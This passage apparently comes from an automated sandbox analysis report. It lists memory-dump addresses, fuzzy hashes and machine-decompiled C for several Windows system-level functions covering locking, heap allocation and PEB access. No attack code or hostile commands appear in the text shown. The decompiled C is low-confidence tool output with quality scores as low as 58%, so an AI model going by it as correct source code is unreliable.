0x04b144e1
0x04b144e6
0x04b144e8
0x04b144fb
0x04b144fb
0x04b144e8
0x00000000
0x04abaa5e
0x04b14476
0x04abaa42
0x04abaa46
0x04abaa48
0x04abaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fbaccb0ece1ce581c6b15f941b928ddbc2dd596f8468c825773a40458d6ecc4
Instruction ID: 072b85bc3192286ba8755969023dd48c9f157ed45223a9ef9067532d5a00e711
Opcode Fuzzy Hash: 7fbaccb0ece1ce581c6b15f941b928ddbc2dd596f8468c825773a40458d6ecc4
Instruction Fuzzy Hash: 7F31B471A00619ABDF149F68CE81ABFB7B9FF04704B41446AF905EB150EB74BD11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AF8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04AF8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4bad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04AE4E70(0x4ba86e4, 0x4af9490, 0, 0);
					if( *0x4ba53e8 > 5 && E04AF8F33(0x4ba53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4ba53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4ba53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4a9bc46;
						_t48 = E04B37B9C(0x4ba53e8, 0x4a9bc46, _t67, 0x4ba53e8, _t70,  &_v140);
					}
				}
				return E04AFB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x04af8ec7
0x04af8ed9
0x04af8edc
0x04af8ee6
0x04af8ee9
0x04af8eee
0x04af8efc
0x04af8f08
0x04b31349
0x04b31353
0x04b3135d
0x04b31366
0x04b3136f
0x04b31375
0x04b3137c
0x04b31385
0x04b31390
0x04b31391
0x04b3139c
0x04b3139d
0x04b313a6
0x04b313ac
0x04b313b2
0x04b313b5
0x04b313bc
0x04b313bf
0x04b313c2
0x04b313c5
0x04b313c8
0x04b313cb
0x04b313ce
0x04b313d1
0x04b313d4
0x04b313d7
0x04b313da
0x04b313dd
0x04b313e0
0x04b313e3
0x04b313e6
0x04b313e9
0x04b313f6
0x04b31400
0x04b31400
0x04af8f08
0x04af8f32

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894827c53dfb12867150596886bb73d1b811c4da48d7580b56ee7280a058aee4
Instruction ID: d745ec91c13ca6c2e13ec4bde09dca8444a0ea2080641d9920bf21441083e56b
Opcode Fuzzy Hash: 894827c53dfb12867150596886bb73d1b811c4da48d7580b56ee7280a058aee4
Instruction Fuzzy Hash: 1A41A5B1D00318AFDB20DF9AD981AADFBF4FB48314F5041AEE509A7240E7746A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04AF4A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04AF4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4bad360 ^ _t62;
				_v8 =  *0x4bad360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04AD2280(_t26, 0x4ba8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04ACFFB0(_t41, _t51, 0x4ba8608);
						L2:
						 *0x4bab1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04AFB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04AD2280(_t28, 0x4ba8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04ACFFB0(_t42, _t53, 0x4ba8608);
							if(_t53 != 0) {
								L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04ACFFB0(_t41, _t51, 0x4ba8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x04af4a2c
0x04af4a34
0x04af4a3c
0x04af4a3e
0x04af4a48
0x04af4a4b
0x04af4a4d
0x04af4a51
0x04af4a9c
0x00000000
0x00000000
0x04af4aa3
0x04af4aa8
0x04af4aad
0x04af4ab1
0x04af4ade
0x04af4ae3
0x04af4a5a
0x04af4a62
0x04af4a6a
0x04af4a6e
0x04b2f203
0x04af4a84
0x04af4a88
0x04af4a89
0x04af4a8a
0x04af4a95
0x04af4a95
0x04af4a79
0x04af4a80
0x04af4af2
0x04af4af4
0x04af4af9
0x04af4aff
0x04af4b01
0x04af4b03
0x04af4b08
0x04b2f20a
0x04b2f212
0x04b2f216
0x04b2f216
0x04af4b08
0x04af4b13
0x04af4b1a
0x04b2f229
0x04b2f229
0x04af4b1a
0x04af4a82
0x00000000
0x04af4a82
0x04af4ab7
0x04af4acd
0x04af4acd
0x04af4ad5
0x04af4ada
0x00000000
0x04af4ada
0x04af4ac2
0x04af4acb
0x00000000
0x00000000
0x00000000
0x04af4acb
0x04af4a53
0x04af4a53
0x04af4a58
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ac9eab6b89bb86a74e5c85988ccc8b9af3758a569d94fc38cf469bdb634a7a0
Instruction ID: d46c53e6ce82447852dd991f1e94694ed9d2bc0c0db7ad1dc123fe6680ca8635
Opcode Fuzzy Hash: 1ac9eab6b89bb86a74e5c85988ccc8b9af3758a569d94fc38cf469bdb634a7a0
Instruction Fuzzy Hash: 613102322056109BD721AF98CE44B2BBBB5FF99714F884869FA560BA90D770F810CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04AEE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04AEE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04AF9670() < 0) {
					L04B0DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4ba7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04AD4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04AEE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x04aee730
0x04aee736
0x04aee738
0x04aee73d
0x04aee73e
0x04aee740
0x04aee749
0x04aee765
0x04aee76a
0x04aee76b
0x04aee76c
0x04aee76d
0x04aee76e
0x04aee76f
0x04aee775
0x04aee777
0x04aee77e
0x04b2b675
0x04aee784
0x04aee784
0x04aee789
0x04aee7a8
0x04aee7ac
0x04aee807
0x04aee7ae
0x04aee7ae
0x04aee7b1
0x04aee7b4
0x04aee7b9
0x04aee7c0
0x04aee7c4
0x04aee7ca
0x04aee7cc
0x00000000
0x04aee7d3
0x04aee7d6
0x00000000
0x00000000
0x04aee7ff
0x04aee802
0x00000000
0x00000000
0x04aee7f9
0x04aee7fc
0x00000000
0x00000000
0x04aee7f3
0x04aee7f6
0x00000000
0x00000000
0x04aee7ed
0x04aee7f0
0x00000000
0x00000000
0x04aee7e7
0x04aee7ea
0x00000000
0x00000000
0x04b2b685
0x04b2b688
0x00000000
0x00000000
0x04b2b682
0x00000000
0x00000000
0x04aee7cc
0x04aee7d9
0x04aee7dc
0x04aee7de
0x04aee7de
0x04aee7ac
0x04aee7e4
0x04aee74b
0x04aee751
0x04aee759
0x04aee761
0x04aee761

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def507dab6a8f6c3883346a51cb5a5b27a77d75c0b89294130e00e2eb40e0946
Instruction ID: 8f46b6f32b8878b4641b569b27eee9d51fedefc4994a244c54fe3e113097c3e1
Opcode Fuzzy Hash: def507dab6a8f6c3883346a51cb5a5b27a77d75c0b89294130e00e2eb40e0946
Instruction Fuzzy Hash: 81318DB5A14249EFE744CF59C841B9ABBE8FB19314F14825AF918CB341E631ED80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AEBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04AEBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4ba6100; // 0x47
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04AD2280(0xd, 0x17a3f1a0);
				_t41 =  *0x4ba60f8; // 0x0
				if(_t41 != 0) {
					 *0x4ba60f8 =  *_t41;
					 *0x4ba60fc =  *0x4ba60fc + 0xffff;
				}
				E04ACFFB0(_t41, 0x800, 0x17a3f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4ba60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04AD4620(0x4ba6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4ba6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x04aebc36
0x04aebc42
0x04aebc45
0x04aebc4a
0x04aebd35
0x00000000
0x00000000
0x00000000
0x00000000
0x04aebc50
0x04aebc50
0x04aebc58
0x04aebc5a
0x04aebc60
0x00000000
0x00000000
0x04b2a4f2
0x04b2a4f6
0x00000000
0x00000000
0x00000000
0x04b2a4fc
0x04aebc79
0x04aebc7e
0x04aebc86
0x04aebd16
0x04aebd20
0x04aebd20
0x04aebc8d
0x04aebc94
0x04aebcbd
0x04aebcca
0x04aebccb
0x04aebccc
0x04aebccd
0x04aebcce
0x04aebcd4
0x04aebcea
0x04aebcee
0x04aebcf2
0x04aebd00
0x04aebd04
0x00000000
0x04aebc96
0x04aebcab
0x04aebcaf
0x04aebd2c
0x04aebd2c
0x04aebd09
0x00000000
0x04aebd09
0x04aebcb1
0x04aebcb5
0x04aebcbb
0x00000000
0x00000000
0x00000000
0x04aebcbb

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2fb2b379ee225b9b37a43f64d532fc1b53671993ed84359dd19feae3d36440
Instruction ID: c26601db2c9db3ea89c0e454537dda3d3a31ffdc2e075fca9fc9c1a90d3e0adc
Opcode Fuzzy Hash: 8a2fb2b379ee225b9b37a43f64d532fc1b53671993ed84359dd19feae3d36440
Instruction Fuzzy Hash: DC31FF72A006159BDB11DF6AC4C1BB673B4EB08314F090079ECA5DB241E638FD598BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AE1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04AE1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04ADF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04AD4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04ADF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04ae1dc2
0x04ae1dc5
0x04ae1dc7
0x04ae1dcc
0x04ae1dce
0x04ae1dd6
0x04ae1ddf
0x04ae1de0
0x04ae1de1
0x04ae1de5
0x04ae1de8
0x04ae1def
0x04ae1df0
0x04ae1df6
0x04ae1df7
0x04ae1dfe
0x04ae1e1a
0x00000000
0x00000000
0x04ae1e0b
0x04ae1e12
0x04ae1e12
0x04ae1e00
0x04ae1e00
0x04ae1e05
0x04ae1e1e
0x04ae1e23
0x04b2570f
0x04b25713
0x00000000
0x00000000
0x04b25719
0x04b25719
0x04ae1e2c
0x04ae1e2d
0x04ae1e2e
0x04ae1e2f
0x04ae1e31
0x04ae1e32
0x04ae1e35
0x04ae1e3d
0x04b25723
0x04b2573d
0x04b2573d
0x00000000
0x04b25723
0x04ae1e49
0x04ae1e4e
0x04ae1e4e
0x04ae1e09
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 725ba6406fe3390a3b004517a5bae05d2e7d7edd15869a7d988bc33f43db59b8
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 41218B72600128AFD721CF9ACD90EBBBBB9EF85684F154055F916A7250DA34BE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AB9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04AB9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4b8f6e8);
				E04B0D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04B888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04B0D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4ba86c0; // 0x9507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4ba86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04AD2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04B888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04AFAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4bab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4ba84c0;
										if(_t69 >=  *0x4ba84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04B89063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04AB922A(_t82);
							_t53 = E04AD7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04B88B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4ba86c0; // 0x9507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4ba86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4ba86bc;
										_t72 = 0x4ba86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04AB9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4ba86c4;
									_t72 = 0x4ba86c0;
									L18:
									E04AE9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x04ab9100
0x04ab9100
0x04ab9100
0x04ab9100
0x04ab9102
0x04ab9107
0x04ab910c
0x04ab9110
0x04ab9115
0x04ab9136
0x04ab9143
0x04b137e4
0x04b137e4
0x04ab9149
0x04ab914e
0x04ab914e
0x04ab9117
0x04ab911d
0x00000000
0x00000000
0x04ab911f
0x04ab9125
0x00000000
0x04ab9151
0x04ab9158
0x04ab915d
0x04ab9161
0x04ab9168
0x04b13715
0x00000000
0x04ab916e
0x04ab916e
0x04ab9175
0x04ab9177
0x04ab917e
0x04ab917f
0x04ab9182
0x04ab9182
0x04ab9187
0x04ab9187
0x04ab918a
0x04ab918d
0x04ab918f
0x04ab9192
0x04ab9195
0x04ab9198
0x04ab9198
0x04ab9198
0x04ab919a
0x00000000
0x00000000
0x04b1371f
0x04b13721
0x04b13727
0x04b1372f
0x04b13733
0x04b13735
0x04b13738
0x04b1373b
0x04b1373d
0x04b13740
0x00000000
0x00000000
0x04b13746
0x04b13749
0x00000000
0x00000000
0x04b1374f
0x04b13751
0x00000000
0x00000000
0x04b13757
0x04b13759
0x04b1375c
0x04b1375c
0x04b1375e
0x04b1375e
0x04b13761
0x04b13764
0x00000000
0x00000000
0x04b13766
0x04b13768
0x04b137a3
0x04b137a3
0x04b137a5
0x04b137a7
0x04b137ad
0x04b137b0
0x04b137b2
0x04b137bc
0x04b137c2
0x04b137c2
0x04b137b2
0x04ab9187
0x04ab9187
0x04ab918a
0x04ab918d
0x04ab918f
0x04ab9192
0x04ab9195
0x00000000
0x04ab9195
0x00000000
0x04ab9187
0x04b1376a
0x04b1376a
0x04b1376c
0x04b1376c
0x04b1376f
0x04b13775
0x00000000
0x00000000
0x04b13777
0x04b13779
0x00000000
0x00000000
0x04b13782
0x04b13787
0x04b13789
0x04b13790
0x04b13790
0x04b1378b
0x04b1378b
0x04b1378b
0x04b13792
0x04b13795
0x04b13795
0x04b13798
0x04b13798
0x04b1379b
0x04b1379b
0x04ab91a3
0x04ab91a9
0x04ab91b0
0x04ab91b4
0x04ab91b4
0x04ab91bb
0x04ab91c0
0x04ab91c5
0x04ab91c7
0x04b137da
0x04ab91cd
0x04ab91cd
0x04ab91cd
0x04ab91d2
0x04ab91d5
0x04ab9239
0x04ab9239
0x04ab91d7
0x04ab91db
0x04ab91e1
0x04ab91e7
0x04ab91fd
0x04ab9203
0x04ab921e
0x04ab9223
0x00000000
0x04ab9223
0x04ab9205
0x04ab9208
0x04ab920c
0x04ab9214
0x04ab9214
0x04ab91e9
0x04ab91e9
0x04ab91ee
0x04ab91f3
0x04ab91f3
0x04ab91f3
0x04ab91e7
0x00000000
0x04ab91db
0x04ab9187
0x04ab9168

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f3882a6a6c60f25f27df2439f6d2b0dad7946cc2987b7efd4fd495ba2dda44
